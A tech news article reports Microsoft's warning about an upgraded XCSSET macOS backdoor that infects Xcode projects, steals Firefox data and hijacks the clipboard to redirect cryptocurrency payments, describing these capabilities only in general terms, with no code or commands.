Microsoft flags dangerous XCSSET macOS malware targeting developers - so be on your guard

News
By published

XCSSET is back and targeting macOS users

An image of macOS’s app switcher.
(Image credit: Image credit: MacFormat)
  • Microsoft detects upgraded XCSSET macOS backdoor used in limited targeted attacks
  • New variant steals Firefox data and hijacks clipboard to redirect cryptocurrency transactions
  • Apple and GitHub are removing malicious repositories linked to the campaign

Microsoft is warning about a new variant of a known macOS backdoor which builds on previous iterations by providing additional capabilities for the attackers.

In its latest report, Microsoft Threat Intelligence claims to have seen an upgraded XCSSET macOS backdoor being used in “limited attacks”.

Developers who unknowingly used these compromised projects would build and run their apps, which triggered the malware. Once inside the system, XCSSET would quietly install itself and begin stealing sensitive data like browser cookies, credentials, and messages. It would also hijack Safari and other browsers to inject malicious code and bypass security protections.

Targeting Firefox and the clipboard

XCSSET was first spotted in 2020, and is primarily known for infecting Xcode development projects used by macOS developers.

Xcode is Apple’s official integrated development environment (IDE) for building apps on macOS, iOS, iPadOS, watchOS, and tvOS.

Five years later, Microsoft spotted a new version of XCSSET, with a few notable changes.

First, it can now steal Firefox browser data, too, by installing a modified build of the open-source HackBrowserData tool.

Second, it comes with a component that can hijack the clipboard - a usual practice for criminals looking to steal people’s cryptocurrency.

When the malware detects a crypto address in the clipboard, it will replace it with the one belonging to the attackers, so that when the victim wants to copy and paste the receiver address, they actually end up sending money to the attackers.

Finally, the malware comes with a new persistence method, making sure it remains hidden on the compromised device, for longer.

The good news is that Microsoft only saw it in limited attacks, meaning it hasn’t yet made significant damage. It already notified both Apple and GitHub, who are now working on removing the repositories linked to the campaign.

Via BleepingComputer

You might also like

TOPICS
Sead Fadilpašić

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.

You must confirm your public display name before commenting

Please logout and then login again, you will then be prompted to enter your display name.